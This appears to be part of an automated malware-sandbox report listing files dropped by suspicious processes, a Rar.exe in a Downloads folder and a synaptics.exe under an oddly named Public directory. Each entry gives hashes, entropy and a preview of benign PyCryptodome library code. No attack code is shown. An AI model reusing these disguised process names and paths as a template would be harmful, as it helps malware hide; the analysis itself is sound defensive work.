                                                                                                                                                                                      Preview:#..# PublicKey/_PBES.py : Password-Based Encryption functions..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):781
                                                                                                                                                                                      Entropy (8bit):4.711755021635503
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                                                                      MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                                                                      SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                                                                      SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                                                                      SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1571
                                                                                                                                                                                      Entropy (8bit):5.20334357876001
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHu:MwDqrYJALrYJHdt3EHGuIO
                                                                                                                                                                                      MD5:2EB5A616573613C3856A549BD00DE6D4
                                                                                                                                                                                      SHA1:D5DEA35B8153B724AF5C1974FE8E65716F917C42
                                                                                                                                                                                      SHA-256:655DBE52F138022CCDAEF6DB28569EBA1D513617D12AD88685D793E40C21F5FA
                                                                                                                                                                                      SHA-512:6615DD25F7CFB1F058CA7DED52E5126F5DB983B7EABA10D8F403113D21D942EA4A241A81A2451AD2FD78048F5303D94AA16AFC2DA60348A75609CD1567E0223E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4543
                                                                                                                                                                                      Entropy (8bit):5.783120805321905
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:pClXflwfEc4b6m/KEHSjZtJ4uoJZ/jWR8I4wqAAS4IILLgPT:pCffv6miHZtJ4uOjO8I4wqAATIILEL
                                                                                                                                                                                      MD5:7FC977413F7FDB99751D9D153DF567D3
                                                                                                                                                                                      SHA1:4AA262B9412AC6B202B3ADB3A11253A788426997
                                                                                                                                                                                      SHA-256:E1ED35D861DC85E42309D4DD1FE8B3FF805DC35F9D2F5E6B2BEE4E8F9C5EC6BD
                                                                                                                                                                                      SHA-512:1820F806CB51E43E15AF2BF0CEE2CF8A687E5D97C752539F4EAB40CD73A33F66D216EE4CA6D1EE0CAD11FA4734B1CC4D0160086D21090FFD93D0954A1036FC74
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...encode..decode.....N)...a2b_base64..b2a_base64..hexlify..unhexlify)...MD5)...pad..unpad)...DES..DES3..AES)...PBKDF1)...get_random_bytes)...tobytes..tostrc........................s....|.d.u.r.t.}.d.|...}.|.rB|.d...}.t.|.|.d.d.t...}.|.t.|.|...|.d.d.t...7.}.t...|.t.j.|...}.|.d.t.t.|...........7.}.|...t...|.j.......n.|.d.u.rJt.d.......f.d.d...t.d.t.....d...D...}.|.d...|...7.}.|.d.|...7.}.|.S.).a4...Encode a piece of binary data into PEM format... Args:. data (byte string):. The piece of binary data to encode.. marker (string):. The marker for the PEM block (e.g. "PUBLIC KEY").. Note that there is no official master list for all allowed markers.. Still, you can refer to the OpenSSL_ source code.. passphrase (byte string):. If given,
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):187
                                                                                                                                                                                      Entropy (8bit):5.092460882202697
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/hUlGptBlxnzgmgudWEJDkzzXhm1aHF50YTlHX0M9VWrz4ixikcTgf:y/RpznzgmgSW+91aHxEM9ArMAy+
                                                                                                                                                                                      MD5:6F8A5A9A3D7020C0B4B7E98AF0C553E9
                                                                                                                                                                                      SHA1:32BF262084DC8EDC9B352EA56ED1698408D28A25
                                                                                                                                                                                      SHA-256:4B98AFB16394E7922B00E7BF19230531799530105025689862C43E81764E2AB2
                                                                                                                                                                                      SHA-512:7FC47D95212EF6B505D2AEAFAF9D8375912491FFE0474A4FDD0FBC05AE1AAEE69D5AB95742B9AF615C5935F508F13D51E0F7679EB48BDE3A681250F40BD14547
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f#........................@...s....d.d.g.Z.d.S.)...PEM..PKCS8N)...__all__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\IO\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2064
                                                                                                                                                                                      Entropy (8bit):5.21416007952233
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHPhZhZihFh/hwQ:MwDqrYJALrYJHdt3EHGuIZQ
                                                                                                                                                                                      MD5:2140FE90B368758DCFC5C2D67ED6E518
                                                                                                                                                                                      SHA1:73E682D147BE20F6467047BB68D55BB4F8621E85
                                                                                                                                                                                      SHA-256:61E83C2B11C78BF744D2DAE173F7C76C55A30F130EBEA58BF7B07402E35911B9
                                                                                                                                                                                      SHA-512:ADA52F2DE9B24E11F108FDF3B950ECF141DCC9D2E71D69BD6754E16286348C8322A3C78656FD6D3DC9161D11821272D64CA549B6038593D8725F3837A5A69137
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):84
                                                                                                                                                                                      Entropy (8bit):4.429188967239666
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1mMkoERZ6sLmL3VosL1ydxFo+CsaCAX7y:1+ZRZHL+fW4CAe
                                                                                                                                                                                      MD5:FC8E19CDD7D4DF22C857035B5460E98F
                                                                                                                                                                                      SHA1:FB9CD60C695F8D19ECF44531A14EB9245E764F37
                                                                                                                                                                                      SHA-256:37E4E3AA463400EF4A3F01217B46A3237D2FDA2795C78F936CC936AAB1875701
                                                                                                                                                                                      SHA-512:314603B6BB03875A9B59F8A76BF32DABD71E52DC30D44C48C6C975746416227EF05144888620D3984712B78CBE899CE8DCEA4ED34C4883015562A7E217F98571
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from Crypto.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11740
                                                                                                                                                                                      Entropy (8bit):4.884742143024647
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IxIODJdMKQklQGODJdQ3Tegyi8OITS9/FJQmZErBGLmhKwFEpECy:0rskrs9Vq6n3frHjmoLCL
                                                                                                                                                                                      MD5:AE61D84D5BE5CB0CB862A6866FDB9BE4
                                                                                                                                                                                      SHA1:EB6C1A5C08C6BC73C452FAE4D3D4E8A17FD65649
                                                                                                                                                                                      SHA-256:038B088D41F46E28054BDAA8B87C02CF000373236262DDC9339EA04B00C792D2
                                                                                                                                                                                      SHA-512:403B5FC86A2773C23A760E57B32C37526EDC54BDD66B9E8C6DB0508B0C915936F832FB234F7D32664E8B74CE33F572E8D4F03AE0A1E7AA03E389FC9244FF69D6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):841
                                                                                                                                                                                      Entropy (8bit):4.5810465816498
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                                                                      MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                                                                      SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                                                                      SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                                                                      SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11681
                                                                                                                                                                                      Entropy (8bit):4.670674998377733
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0qrskrs9t3q/IyvDBjC3zodQSHDoC4Y/zI3lSAKlWEma9XtI:zrskrs9VqvDlC3zgWqI3wAKQOtI
                                                                                                                                                                                      MD5:6EDF38CB6E10A7DF678A33D0A6F3875A
                                                                                                                                                                                      SHA1:E65A1DAEC79E81055FEBCD20B7D93302FCDB1CDA
                                                                                                                                                                                      SHA-256:F51738EF5459C02A5CDD445D2EB46EE410CA625A348FC825D89A374EFB86095E
                                                                                                                                                                                      SHA-512:B16130FCDC9B66B1BAEC876CF61AC93E29A3E80BCBD5668CC7FE6E2EED444BBC13D248C2692E90B7D9D55C313F5C65C9F2EF853B31E6B9D3758FC1FA47B89EE2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3810
                                                                                                                                                                                      Entropy (8bit):4.6872218402303165
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
                                                                                                                                                                                      MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                                                                      SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                                                                      SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                                                                      SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5893
                                                                                                                                                                                      Entropy (8bit):4.785323629162045
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:MbDqrYJALrYJHdt3EHGuIW0GAsIpLVmTIYv7Ac450L1VmXRnWPPe4LSTZ3YPH:0qrskrs9t3q/ILXVkIq745S1VmXVW+uJ
                                                                                                                                                                                      MD5:5BDE183C4A86339EBCDABA6469350350
                                                                                                                                                                                      SHA1:BA6BB73F83FE362D87182392A42A12C40A5FC3E9
                                                                                                                                                                                      SHA-256:A4DDFDEB17DAAAA6C77F417677E01545115DACF477C77E99F2B4E9B69A836A60
                                                                                                                                                                                      SHA-512:767D975AB4E894EB24ABAC860BA5DE79AF39848D1862235F04B06A735F3F53E5E785D24B6757A49B8036B30F187895BFD478B34B76716AB45DFB3F07EFEAB8B1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):143
                                                                                                                                                                                      Entropy (8bit):4.509027321360697
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                                                                      MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                                                                      SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                                                                      SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                                                                      SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):28245
                                                                                                                                                                                      Entropy (8bit):4.4059189254872075
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:0rskrs9Vq6zWGjPJlPwLV1sJ4K7uvMQfTIfWFObegDQNqnP0+X3TrsvV31r4mu:0r6q6zWGPPI3xvMQfjCP0kDGvk
                                                                                                                                                                                      MD5:026CC8BB1EE4ECA1D478589549383486
                                                                                                                                                                                      SHA1:83B29A49CE8F5EA8C1FA5255C7E9E772A7C2BF89
                                                                                                                                                                                      SHA-256:F896F9D6C42D49AA3F59A30B887927BEEDEFDE6DCC840C97D4ECF01931079084
                                                                                                                                                                                      SHA-512:56EDC68E2EAF59E0D731256274BE169F2E109B4DAF806F50373D93B758F310B4462641DA6C186F489156AD4441101B32631BBD5D55ED3A4CA858F731A7A68330
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                      Entropy (8bit):4.306529623636421
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                                                                      MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                                                                      SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                                                                      SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                                                                      SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11706
                                                                                                                                                                                      Entropy (8bit):4.6054682088352425
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/ICZ7QVq4iMJK1efS4ohX2EGupgYL1kX38q6Rp:0rskrs9VqJ4iMK1efamipgYL1kX38qe
                                                                                                                                                                                      MD5:B1274BA41A935E6006C7CCB1A81ED57E
                                                                                                                                                                                      SHA1:F025D6E5885E29EE4D246C7BE4E572A86874C37B
                                                                                                                                                                                      SHA-256:2EE1971FAF400609AC9F569BC9F435FF18F0DFC2ECECE7BC7F45DD4183A04CFF
                                                                                                                                                                                      SHA-512:C9CAA76F6C2AF4F5C4CB4C7DF57DEDE96ED07BECC44503FB67BDA27CA30EAA77EC5C143732FC3CDEA266228F22E7B14DC9582B31FFB71C84EE4E01BFD66F4A96
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):84
                                                                                                                                                                                      Entropy (8bit):4.2558290658438995
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                                                                      MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                                                                      SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                                                                      SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                                                                      SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):563
                                                                                                                                                                                      Entropy (8bit):5.388480206069932
                                                                                                                                                                                      Encrypted:false
